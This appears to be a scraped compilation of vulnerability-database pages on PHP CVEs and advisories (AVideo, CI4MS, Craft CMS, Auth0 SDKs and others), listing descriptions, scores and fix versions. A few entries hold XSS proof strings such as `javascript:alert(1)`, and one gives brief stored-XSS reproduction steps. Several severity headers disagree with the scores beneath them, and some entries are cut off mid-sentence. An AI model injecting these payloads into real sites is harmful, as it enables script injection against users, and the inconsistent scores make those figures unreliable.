blogs_wiz·CVSS 8.1
## CVE-2026-33038: PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. Versions 25.0 and below are vulnerable to unauthenticated application takeover through the install/checkConfiguration.php endpoint. install/checkConfiguration.php performs full application initialization: database setup, admin account creation, and configuration file write, all from an unauthenticated POST input. The only guard is checking whether videos/configuration.php already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access. This issue has been fixed in version 26.0.
Source : NVD
## 8.1
Score
Published March 20, 2026
Wiz
CVE-2026-33500 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
## CVE-2026-33500: PHP vulnerability analysis and mitigation
Advisory references: `ParsedownSafeWithLinks`, `safeMode`, `[text](javascript:alert(1))`, `inlineLink()`, `sanitizeATag()`, `javascript:`, `sanitiseElement()`, `filterUnsafeUrlInAttribute()`
Source : NVD
## 5.4
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 21, 2026
Wiz
CVE-2026-25509 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-25509: PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.28.5.0, the authentication implementation in CI4MS is vulnerable to email enumeration. An unauthenticated attacker can determine whether an email address is registered in the system by analyzing the application's response during the password reset process. This issue has been patched in version 0.28.5.0.
Source : NVD
## 5.3
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.3
Wiz
GHSA-7hmv-4j2j-pp6f [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## GHSA-7hmv-4j2j-pp6f: PHP vulnerability analysis and mitigation
## Impact
Advisory references: `ActorEventPacket`, `AnimatePacket`, `LevelSoundEventPacket`
## Patches
Advisory references: `ActorEventPacket`
## Workarounds
Advisory references: `DataPacketDecodeEvent`, `ActorEventPacket`
Source : NVD
## 4.3
Score
Published April 6, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pocketmine/pocketmine-mp
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Apr 07, 2026
Wiz
CVE-2026-34566 [CRITICAL] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
## CVE-2026-34566: PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Page Management functionality when creating or editing pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side. These stored values are later rendered without proper output encoding across administrative page lists and public-facing page views, leading to stored DOM-based cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
## 9
Score
Published April 1, 2026
Severity CRITICAL
CNA Score 9.1
Wiz
GHSA-p2gh-cfq4-4wjc [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## GHSA-p2gh-cfq4-4wjc: PHP vulnerability analysis and mitigation
## Impact
Advisory references: `varint`
## Patches
Patches have been released to 5.34.0-RC1 and 4.33.6.
Source : NVD
## 7.1
Score
Published March 25, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
google/protobuf
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 26, 2026
Wiz
CVE-2026-35181 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
## CVE-2026-35181: PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the player skin configuration endpoint at admin/playerUpdate.json.php does not validate CSRF tokens. The plugins table is explicitly excluded from the ORM's domain-based security check via ignoreTableSecurityCheck(), removing the only other layer of defense. Combined with SameSite=None cookies, a cross-origin POST can modify the video player appearance on the entire platform.
Source : NVD
## 4.3
Score
Published April 6, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.8
Wiz
CVE-2026-28782 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-28782: PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 5.9.0-beta.1 and 4.17.0-beta.1, the "Duplicate" entry action does not properly verify if the user has permission to perform this action on the specific target elements. Even with only "View Entries" permission (where the "Duplicate" action is restricted in the UI), a user can bypass this restriction by sending a direct request. Furthermore, this vulnerability allows duplicating other users' entries by specifying their Entry IDs. Since Entry IDs are incremental, an attacker can trivially brute-force these IDs to duplicate and access restricted content across the system. This vulnerability is fixed in 5.9.0-beta.1 and 4.17.0-beta.1.
Source : NVD
## 5.3
Score
Wiz
CVE-2026-28424 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
## CVE-2026-28424: PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.11 and 6.4.0, user email addresses were included in responses from the user fieldtype's data endpoint for control panel users who did not have the "view users" permission. This has been fixed in 5.73.11 and 6.4.0.
Source : NVD
## 6.5
Score
Published February 27, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar 02, 2026
Wiz
CVE-2026-33480 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
## CVE-2026-33480: PHP vulnerability analysis and mitigation
Advisory references: `isSSRFSafeURL()`, `::ffff:x.x.x.x`, `plugin/LiveLinks/proxy.php`
Source : NVD
## 8.6
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
Wiz
CVE-2025-68437 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.0
## CVE-2025-68437: PHP vulnerability analysis and mitigation
Advisory references: `save__Asset`, `_file`, `url`
Source : NVD
## 5
Score
Published January 5, 2026
Severity MEDIUM
CNA Score 5.0
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:craftcms:craft_cms
craftcms/cms
Sources
Composer Severity MEDIUM Has Fix Added at: Jan 05, 2026
Linux Severity MEDIUM Has Fix Added at: Jan 06, 2026
Windows Severity MEDIUM Has Fix Added at: Jan 06, 2026
Linux Severity MEDIUM Has Fix Added at: Jan 13, 2026
Windows Severity MEDIUM Has Fix Added at: Jan 13, 2026
Wiz
CVE-2026-34570 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
## CVE-2026-34570: PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to immediately revoke active user sessions when an account is deleted. Due to a logic flaw in the backend design, account state changes are enforced only during authentication (login), not for already-established sessions. The system implicitly assumes that authenticated users remain trusted for the lifetime of their session. There is no session expiration or account expiration mechanism in place, causing deleted accounts to retain indefinite access until the user manually logs out. This behavior breaks the intended access control policy a
Wiz
CVE-2026-33690 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-33690: PHP vulnerability analysis and mitigation
Advisory references: `getRealIpAddr()`, `objects/functions.php`
Source : NVD
## 5.3
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 26, 2026
Wiz
GHSA-7hh9-gp72-wh7h [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## GHSA-7hh9-gp72-wh7h: PHP vulnerability analysis and mitigation
## Description
In applications built with the Auth0-PHP SDK, the audience validation in access tokens is performed improperly. Without proper validation, affected applications may accept ID tokens as Access tokens.
## Affected product and versions
Users are affected if they meet the following preconditions:
Applications using the Auth0 laravel-auth0 SDK with versions between 7.0.0 and 7.19.0,
Auth0 laravel-auth0 SDK uses the Auth0-PHP SDK with versions between 8.0.0 and 8.17.0.
## Resolution
Upgrade Auth0/laravel-auth0 to version 7.20.0 or greater.
## Acknowledgement
Okta would like to thank Jafar Sadiq (iaf4r) for their discovery and responsible disclosure.
Source : NVD
## 6.8
Score
Wiz
CVE-2026-32268 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
## CVE-2026-32268: PHP vulnerability analysis and mitigation
Advisory references: `DefaultController->actionLoadContainerData()`
Source : NVD
## 8.7
Score
Published March 18, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
craftcms/azure-blob
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 17, 2026
Wiz
GHSA-jp3q-wwp3-pwv9 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## GHSA-jp3q-wwp3-pwv9: PHP vulnerability analysis and mitigation
Advisory references: `dangerouslySetInnerHTML`
Ecosystem: Packagist (Craft CMS plugin)
Package: solspace/craft-freeform
Version:
Open the form builder view containing the field.
Alert executes (stored XSS).
`alert('xss-icon')`
Open the integrations CP view.
Script executes.
## Impact
Arbitrary JS in admin CP; session/CSRF token theft; potential full admin takeover via DOM-driven actions.
## Remediation
Advisory references: `dangerouslySetInnerHTML`
Server-side: strip/escape disallowed tags on save for fields, integration metadata, WYSIWYG content.
## Workarounds
Restrict form-edit permissions to trusted admins only until patched.
Consider CSP that disallows inline scripts (defense-in-depth only).
## Credits
Discovered by https://www.linkedin.com/in/praveenkavinda/
Wiz
CVE-2025-67719 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
## CVE-2025-67719: PHP vulnerability analysis and mitigation
Ibexa is a composable end-to-end DXP (Digital Experience Platform). Versions 5.0.0-beta1 through 5.0.3 do not have password validation. During the transition from v4 to v5 an error was introduced into validation code which causes the validation of the previous password not to run as expected. This makes it possible for a logged in user to change their password in the back office without knowing the previous password. For example, if a user logs into their account and walks away without locking their workstation, an attacker could access the unattended session and change the password, therefore locking the legitimate user out. This issue is fixed in version 5.0.4.
Source : NVD
## 8.5
Score
Published December 11, 2025
Wiz
CVE-2026-24419 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
## CVE-2026-24419: PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contain a critical Error-Based SQL Injection vulnerability in the Prima Nota (Journal Entry) module's add.php file. The application fails to validate that comma-separated values from the id_documenti GET parameter are integers before using them in SQL IN() clauses, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.
Source : NVD
## 8.7
Score
Published February 6, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-33493 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
## CVE-2026-33493: PHP vulnerability analysis and mitigation
Advisory references: `objects/import.json.php`, `fileURI`, `.mp4`, `objects/listFiles.json.php`, `realpath()`, `videos/`, `import.json.php`, `.txt`, `.html`, `.htm`
Source : NVD
## 8.1
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
Wiz
CVE-2026-3244 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
## CVE-2026-3244: PHP vulnerability analysis and mitigation
In Concrete CMS below version 9.4.8, a stored cross-site scripting (XSS) vulnerability exists in the search block, where page names and content are rendered without proper HTML encoding in search results. This allows authenticated, rogue administrators to inject malicious JavaScript through page names that executes when users search for and view those pages in search results. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 4.8 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks to zolpak for reporting.
Source : NVD
## 4.8
Score
Published March 4, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
Wiz
CVE-2019-25317 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
## CVE-2019-25317: PHP vulnerability analysis and mitigation
Kimai 2 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts into timesheet descriptions. Attackers can insert SVG-based XSS payloads in the description field to execute arbitrary JavaScript when the page is loaded and viewed by other users.
Source : NVD
Score 5.1
Published February 11, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
kimai/kimai
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Feb 12, 2026
blogs_wiz·CVSS 5.3
GHSA-ghc5-95c2-vwcv [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-ghc5-95c2-vwcv : PHP vulnerability analysis and mitigation
## Impact
In applications built with the Auth0 PHP SDK, cookies are encrypted with insufficient entropy, which may result in threat actors brute-forcing the encryption key and forging session cookies.
## Am I Affected?
Consumers are affected if their application meets the following preconditions:
- It uses the Auth0 Symfony SDK, versions between 5.0.0 and 5.7.0.
- The Auth0 Symfony SDK uses the Auth0-PHP SDK, versions between 8.0.0 and 8.18.0.
## Resolution
Upgrade Auth0/symfony-auth0 to version 5.8.0 or greater.
Source : NVD
Score 8.2
Published April 3, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
blogs_wiz·CVSS 5.4
CVE-2026-27016 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27016 : PHP vulnerability analysis and mitigation
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 24.10.0 through 26.1.1 are vulnerable to Stored XSS via the unit parameter in Custom OID. The Custom OID functionality lacks strip_tags() sanitization while other fields (name, oid, datatype) are sanitized. The unsanitized value is stored in the database and rendered without HTML escaping. This issue is fixed in version 26.2.0.
Source : NVD
Score 5.4
Published February 20, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
blogs_wiz·CVSS 6.9
CVE-2026-30879 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30879 : PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, baserCMS has a cross-site scripting vulnerability in blog posts. This issue has been patched in version 5.2.3.
Source : NVD
Score 6.9
Published March 31, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
baserproject/basercms
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Apr 02, 2026
blogs_wiz·CVSS 8.6
CVE-2026-33661 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33661 : PHP vulnerability analysis and mitigation
verify_wechat_sign()
src/Functions.php
localhost
Host: localhost
Source : NVD
Score 7.5
Published March 26, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 25.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
yansongda/pay
pay
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 26, 2026
Homebrew Severity HIGH Has Fix Added at: Apr 05, 2026
blogs_wiz·CVSS 5.3
CVE-2026-35545 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35545 : PHP vulnerability analysis and mitigation
An issue was discovered in Roundcube Webmail before 1.5.15 and 1.6.15. The remote image blocking feature can be bypassed via SVG content in an e-mail message. This may lead to information disclosure or access-control bypass. This involves the animate element with attributeName=fill/filter/stroke.
Source : NVD
Score 5.3
Published April 3, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube/roundcubemail
roundcube
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM
blogs_wiz·CVSS 4.7
CVE-2026-34562 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34562 : PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several administrative configuration fields accept attacker-controlled input that is stored server-side and later rendered without proper output encoding. This issue has been patched in version 0.31.0.0.
Source : NVD
Score 4.7
Published April 1, 2026
Severity MEDIUM
CNA Score 4.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
blogs_wiz·CVSS 8.8
CVE-2026-23498 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23498 : PHP vulnerability analysis and mitigation
Shopware is an open commerce platform. From 6.7.0.0 to before 6.7.6.1, a regression of CVE-2023-2017 leads to an array and a crafted PHP Closure not being checked against the allow list for the map(...) override. This vulnerability is fixed in 6.7.6.1.
Source : NVD
Score 7.2
Published January 14, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
shopware/core
shopware/shopware
Sources
NVD
Composer Severity HIGH Has Fix Added at: Jan 14, 2026
blogs_wiz·CVSS 4.9
CVE-2025-68436 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68436 : PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16, authenticated users on a Craft installation could potentially expose sensitive assets through their user profile photo using maliciously crafted requests. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.
Source : NVD
Score 4.9
Published January 5, 2026
Severity MEDIUM
CNA Score 4.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:craftcms:craft_cms
blogs_wiz·CVSS 4.6
CVE-2026-30913 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30913 : PHP vulnerability analysis and mitigation
Flarum is open-source forum software. When the flarum/nicknames extension is enabled, a registered user can set their nickname to a string that email clients interpret as a hyperlink. The nickname is inserted verbatim into plain-text notification emails, and recipients may be misled into visiting attacker-controlled domains.
Source : NVD
Score 4.6
Published March 10, 2026
Severity MEDIUM
CNA Score 4.6
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
flarum/nicknames
Sources
NVD
Composer Severity MEDIUM Has Fix
blogs_wiz·CVSS 9.9
CVE-2026-34569 [CRITICAL] Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34569 : PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog categories. An attacker can inject a malicious JavaScript payload into the category title field, which is then stored server-side. This stored payload is later rendered unsafely across public-facing blog category pages, administrative interfaces, and blog post views without proper output encoding, leading to stored cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
Score 9
Published April 1, 2026
Severity CRITICAL
Published 2026-04-06